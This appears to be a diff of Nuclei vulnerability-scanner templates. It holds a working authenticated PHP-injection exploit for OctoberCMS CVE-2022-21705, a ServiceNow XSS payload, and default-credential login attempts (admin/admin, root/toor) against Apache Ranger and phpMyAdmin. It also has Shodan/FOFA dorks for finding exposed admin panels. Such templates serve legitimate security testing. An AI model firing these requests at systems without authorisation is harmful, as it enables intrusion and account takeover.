-        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
-
-    cookie-reuse: true
-
-    extractors:
-      - type: xpath
-        name: session_key
-        attribute: value
-        xpath:
-          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
-        internal: true
-        # Obtain _session_key for current OctoberCMS session
-
-      - type: xpath
-        name: token
-        attribute: value
-        xpath:
-          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
-        internal: true
-        # Obtain _token for current OctoberCMS session
-
-      - type: regex
-        name: theme
-        part: body
-        group: 1
-        regex:
-          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
-        internal: true
-        # Obtain current theme used for Markup editor of OctoberCMS
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - 'function onInit()'
-          - 'phpinfo()'
-          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
-        condition: and
-        # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
-
-      - type: status
-        status:
-          - 200
+id: CVE-2022-21705
+
+info:
+  name: OctoberCMS Authenticated Remote Code Execution
+  author: iPhantasmic
+  severity: high
+  description: |
+    Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
+  remediation: |
+    The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
+  reference:
+    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
+    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
+    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-21705
+    cwe-id: CWE-74
+  tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
+
+
+requests:
+  - raw:
+      - | # to obtain session_key and token
+        GET /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+
+      - | # to perform authentication and obtain admin cookies
+        POST /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
+
+      - | # to inject php code in Markup editor and perform exploit
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onSave
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
+
+      - | # to obtain theme
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&type=page
+
+      - | # to access the template page for generated exploit
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
+
+    cookie-reuse: true
+
+    extractors:
+      - type: xpath
+        name: session_key
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
+        internal: true
+        # Obtain _session_key for current OctoberCMS session
+
+      - type: xpath
+        name: token
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
+        internal: true
+        # Obtain _token for current OctoberCMS session
+
+      - type: regex
+        name: theme
+        part: body
+        group: 1
+        regex:
+          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
+        internal: true
+        # Obtain current theme used for Markup editor of OctoberCMS
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'function onInit()'
+          - 'phpinfo()'
+          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
+        condition: and
+        # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
+
+      - type: status
+        status:
+          - 200

cves/2022/CVE-2022-38463.yaml

@@ -1,5 +1,5 @@
-id: CVE-2022-38463
-
+id: CVE-2022-38463
+
 info:
   name: ServiceNow - Cross Site Scripting
   author: amanrawat
@@ -18,23 +18,23 @@ info:
     shodan-query: http.title:"ServiceNow"
     verified: "true"
   tags: cve,cve2022,servicenow,xss
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "top.location.href = 'javascript:alert(document.domain)';"
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "top.location.href = 'javascript:alert(document.domain)';"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

default-logins/apache/ranger-default-login.yaml

@@ -1,39 +1,39 @@
-id: ranger-default-login
+id: ranger-default-login
 
-info:
-  name: Apache Ranger Default Login
-  author: For3stCo1d
-  severity: high
-  reference: https://github.com/apache/ranger
-  metadata:
-    shodan-query: http.title:"Ranger - Sign In"
-  tags: apache,ranger,default-login
+info:
+  name: Apache Ranger Default Login
+  author: For3stCo1d
+  severity: high
+  reference: https://github.com/apache/ranger
+  metadata:
+    shodan-query: http.title:"Ranger - Sign In"
+  tags: apache,ranger,default-login
 
-requests:
-  - raw:
-      - |
-        POST /login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{user}}&password={{pass}}
-
-    attack: pitchfork
-    payloads:
-      user:
-        - admin
-      pass:
-        - admin
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"statusCode":200'
-          - '"msgDesc":"Login Successful"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{user}}&password={{pass}}
+
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+      pass:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"statusCode":200'
+          - '"msgDesc":"Login Successful"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

default-logins/phpmyadmin/phpmyadmin-default-login.yaml

@@ -1,73 +1,73 @@
-id: phpmyadmin-default-login
-
-info:
-  name: phpMyAdmin Default Login
-  author: Natto97
-  severity: high
-  description: phpMyAdmin default admin credentials were discovered
-  reference:
-    - https://www.phpmyadmin.net
-  metadata:
-    verified: true
-    shodan-query: http.title:phpMyAdmin
-  tags: default-login,phpmyadmin
-
-
-requests:
-  - raw:
-      - |
-        GET /index.php HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        POST /index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Cookie: phpMyAdmin={{token2}}; pma_lang=en
-
-        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
-
-    attack: clusterbomb
-    payloads:
-      user:
-        - root
-        - mysql
-      password:
-        - 123456
-        - root
-        - mysql
-        - toor
-
-    extractors:
-      - type: regex
-        name: token
-        internal: true
-        group: 1
-        regex:
-          - 'name="token" value="([0-9a-z]+)"'
-
-      - type: regex
-        name: token2
-        internal: true
-        group: 1
-        regex:
-          - 'name="set_session" value="([0-9a-z]+)"'
-
-      - type: regex
-        name: session
-        part: header
-        internal: true
-        group: 1
-        regex:
-          - "phpMyAdmin=([0-9a-z]+)"
-
-    req-condition: true
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
-          - status_code_2 == 302
-          - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
-        condition: and
+id: phpmyadmin-default-login
+
+info:
+  name: phpMyAdmin Default Login
+  author: Natto97
+  severity: high
+  description: phpMyAdmin default admin credentials were discovered
+  reference:
+    - https://www.phpmyadmin.net
+  metadata:
+    verified: true
+    shodan-query: http.title:phpMyAdmin
+  tags: default-login,phpmyadmin
+
+
+requests:
+  - raw:
+      - |
+        GET /index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: phpMyAdmin={{token2}}; pma_lang=en
+
+        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
+
+    attack: clusterbomb
+    payloads:
+      user:
+        - root
+        - mysql
+      password:
+        - 123456
+        - root
+        - mysql
+        - toor
+
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - 'name="token" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: token2
+        internal: true
+        group: 1
+        regex:
+          - 'name="set_session" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: session
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "phpMyAdmin=([0-9a-z]+)"
+
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
+          - status_code_2 == 302
+          - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
+        condition: and

exposed-panels/beyondtrust-login-server.yaml

@@ -1,31 +1,31 @@
-id: beyondtrust-login-server
+id: beyondtrust-login-server
 
-info:
-  name: BeyondTrust PAM login Server
-  author: r3dg33k,nuk3s3c
-  severity: info
-  tags: beyondtrust,pam,panel
+info:
+  name: BeyondTrust PAM login Server
+  author: r3dg33k,nuk3s3c
+  severity: info
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        regex:
-          - '"DomainName":"(.*)"'
-          - '"domains":'
-        condition: and
-
-    extractors:
-      - type: json
-        part: body
-        json:
-          - ".domains[] | .DomainName"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - '"DomainName":"(.*)"'
+          - '"domains":'
+        condition: and
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - ".domains[] | .DomainName"
           - ".domains[] | .ldapservers"

exposed-panels/beyondtrust-panel.yaml

@@ -1,21 +1,21 @@
-id: beyondtrust-panel
+id: beyondtrust-panel
 
-info:
-  name: BeyondTrust Login Panel
-  author: r3dg33k,nuk3s3c
-  severity: info
-  description: Detects default Login page for Beyond Trust PAM solution
-  metadata:
-    shodan-query: http.html:"BeyondInsight"
-  tags: beyondtrust,pam,panel
+info:
+  name: BeyondTrust Login Panel
+  author: r3dg33k,nuk3s3c
+  severity: info
+  description: Detects default Login page for Beyond Trust PAM solution
+  metadata:
+    shodan-query: http.html:"BeyondInsight"
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/'
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>BeyondInsight</title>"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>BeyondInsight</title>"

exposed-panels/epson-projector-detect.yaml

@@ -1,27 +1,27 @@
-id: epson-projector-detect
+id: epson-projector-detect
 
-info:
-  name: Epson Projector
-  author: gy741
-  severity: info
-  metadata:
-    fofa-query: "cgi-bin/webconf.exe"
-  tags: iot,projector,panel,unauth,epson
+info:
+  name: Epson Projector
+  author: gy741
+  severity: info
+  metadata:
+    fofa-query: "cgi-bin/webconf.exe"
+  tags: iot,projector,panel,unauth,epson
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "cgi-bin/webconf.exe?page=1"
-          - "<title>Web Control</title>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "cgi-bin/webconf.exe?page=1"
+          - "<title>Web Control</title>"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/extreme-netconfig-ui.yaml

@@ -1,33 +1,33 @@
-id: extreme-netconfig-ui
+id: extreme-netconfig-ui
 
-info:
-  name: Extreme NetConfig UI
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'http.title:"Extreme NetConfig UI"'
-  tags: panel,tech,hiveos,extreme
+info:
+  name: Extreme NetConfig UI
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"Extreme NetConfig UI"'
+  tags: panel,tech,hiveos,extreme
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php5"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Extreme NetConfig UI</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php5"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Extreme NetConfig UI</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'

exposed-panels/hitron-technologies.yaml

@@ -1,25 +1,25 @@
-id: hitron-technologies-detect
+id: hitron-technologies-detect
 
-info:
-  name: Hitron Technologies
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7062
-  tags: router,panel
+info:
+  name: Hitron Technologies
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7062
+  tags: router,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "hitron"
-          - "$.hitron.languages.lang_init();"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hitron"
+          - "$.hitron.languages.lang_init();"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/hpe-system-management-login.yaml

@@ -1,27 +1,27 @@
-id: hpe-system-management-login
+id: hpe-system-management-login
 
-info:
-  name: HPE System Management Login
-  author: divya_mudgal
-  severity: info
-  tags: hpe,tech,panel
+info:
+  name: HPE System Management Login
+  author: divya_mudgal
+  severity: info
+  tags: hpe,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/cpqlogin.htm"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: and
-        part: body
-        words:
-          - "HPE System Management Homepage"
-          - "/proxy/ssllogin"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "HPE System Management Homepage v([0-9-.]*)"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cpqlogin.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        part: body
+        words:
+          - "HPE System Management Homepage"
+          - "/proxy/ssllogin"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "HPE System Management Homepage v([0-9-.]*)"

exposed-panels/kenesto-login.yaml

@@ -1,26 +1,26 @@
-id: kenesto-login
+id: kenesto-login
 
-info:
-  name: Kenesto Login Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="kenesto"'
-  tags: login,tech,kenesto
+info:
+  name: Kenesto Login Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="kenesto"'
+  tags: login,tech,kenesto
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Welcome To Kenesto&reg;</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Welcome To Kenesto&reg;</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-panels/lansweeper-login.yaml

@@ -1,26 +1,26 @@
-id: lansweeper-login
+id: lansweeper-login
 
-info:
-  name: Lansweeper Login
-  author: divya_mudgal
-  severity: info
-  tags: lansweeper,tech,panel
+info:
+  name: Lansweeper Login
+  author: divya_mudgal
+  severity: info
+  tags: lansweeper,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.aspx"
-      - "{{BaseURL}}/favicon.ico"
-
-    stop-at-first-match: true
-    matchers-condition: or
-    matchers:
-      - type: word
-        name: login
-        words:
-          - "Lansweeper - Login"
-
-      - type: dsl
-        name: favicon
-        dsl:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.aspx"
+      - "{{BaseURL}}/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: login
+        words:
+          - "Lansweeper - Login"
+
+      - type: dsl
+        name: favicon
+        dsl:
           - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"

exposed-panels/linksys-wifi-login.yaml

@@ -1,28 +1,28 @@
-id: linksys-wifi-login
+id: linksys-wifi-login
 
-info:
-  name: Linksys Smart Wi-Fi
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: http.title:"Linksys Smart WI-FI"
-  tags: tech,panel,linksys,iot
+info:
+  name: Linksys Smart Wi-Fi
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: http.title:"Linksys Smart WI-FI"
+  tags: tech,panel,linksys,iot
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    redirects: true
-    max-redirects: 2
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>Linksys Smart Wi-Fi</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Linksys Smart Wi-Fi</title>"
+
+      - type: status
+        status:
+          - 200

exposed-panels/minio-console.yaml

@@ -1,26 +1,26 @@
-id: minio-console
+id: minio-console
 
-info:
-  name: MinIO Console
-  author: pussycat0x
-  severity: info
-  tags: panel,minio
-  metadata:
-    fofa-query: app="MinIO-Console"
-    shodan-query: title:"MinIO Console"
+info:
+  name: MinIO Console
+  author: pussycat0x
+  severity: info
+  tags: panel,minio
+  metadata:
+    fofa-query: app="MinIO-Console"
+    shodan-query: title:"MinIO Console"
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login"
-
-    matchers-condition: and
-    matchers:
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(body), '<title>minio console</title>')"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(body), '<title>minio console</title>')"
+
+      - type: status
+        status:
           - 200

exposed-panels/ms-adcs-detect.yaml

@@ -1,29 +1,29 @@
-id: ms-adcs-detect
+id: ms-adcs-detect
 
-info:
-  name: MS Active Directory Certificate Services Detector
-  author: divya_mudgal
-  severity: info
-  tags: microsoft,ad,panel
+info:
+  name: MS Active Directory Certificate Services Detector
+  author: divya_mudgal
+  severity: info
+  tags: microsoft,ad,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 302
-          - 301
-        condition: or
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(all_headers), '/certsrv')"
-
-    extractors:
-      - type: kval
-        kval:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+          - 301
+        condition: or
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(all_headers), '/certsrv')"
+
+    extractors:
+      - type: kval
+        kval:
           - location

exposed-panels/netdata-dashboard-detected.yaml

@@ -1,25 +1,25 @@
-id: netdata-dashboard-detect
+id: netdata-dashboard-detect
 
-info:
-  name: NetData Dashboard Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'Server: NetData Embedded HTTP Server'
-  tags: netdata,panel,tech
+info:
+  name: NetData Dashboard Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'Server: NetData Embedded HTTP Server'
+  tags: netdata,panel,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>netdata dashboard</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>netdata dashboard</title>'
+
+      - type: status
+        status:
+          - 200

exposed-panels/openemr-detect.yaml

@@ -1,26 +1,26 @@
-id: openemr-detect
-
-info:
-  name: OpenEMR Product Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: app="OpenEMR"
-    shodan-query: http.html:"OpenEMR"
-  tags: panel,openemr
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/interface/login/login.php?site=default"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"title":"OpenEMR Product Registration"'
-
-      - type: status
-        status:
-          - 200
+id: openemr-detect
+
+info:
+  name: OpenEMR Product Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: app="OpenEMR"
+    shodan-query: http.html:"OpenEMR"
+  tags: panel,openemr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/interface/login/login.php?site=default"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"title":"OpenEMR Product Registration"'
+
+      - type: status
+        status:
+          - 200

exposed-panels/qualcomm-voip-router.yaml

@@ -1,25 +1,25 @@
-id: qualcomm-voip-router
+id: qualcomm-voip-router
 
-info:
-  name: Qualcomm 4G LTE WiFi VoIP-Router
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
-  tags: panel,qualcomm,iot,router,voip
+info:
+  name: Qualcomm 4G LTE WiFi VoIP-Router
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
+  tags: panel,qualcomm,iot,router,voip
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>4G LTE WiFi VoIP Router</title>'
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>4G LTE WiFi VoIP Router</title>'
+
+      - type: status
+        status:
           - 200

exposed-panels/r-webserver-login.yaml

@@ -1,23 +1,23 @@
-id: r-webserver-login
+id: r-webserver-login
 
-info:
-  name: R WebServer Login
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7132
-  tags: panel,rwebserver
+info:
+  name: R WebServer Login
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7132
+  tags: panel,rwebserver
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>R WebServer</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>R WebServer</title>"
+
+      - type: status
+        status:
+          - 200

exposed-panels/securepoint-utm.yaml

@@ -1,32 +1,32 @@
-id: securepoint-utm
+id: securepoint-utm
 
-info:
-  name: Securepoint UTM Admin Panel
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
-  tags: securepoint,panel
+info:
+  name: Securepoint UTM Admin Panel
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
+  tags: securepoint,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        part: body
-        regex:
-          - '<title>Securepoint UTM v11 - (.*)</title>'
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - '<title>Securepoint UTM v11 - (.*)</title>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'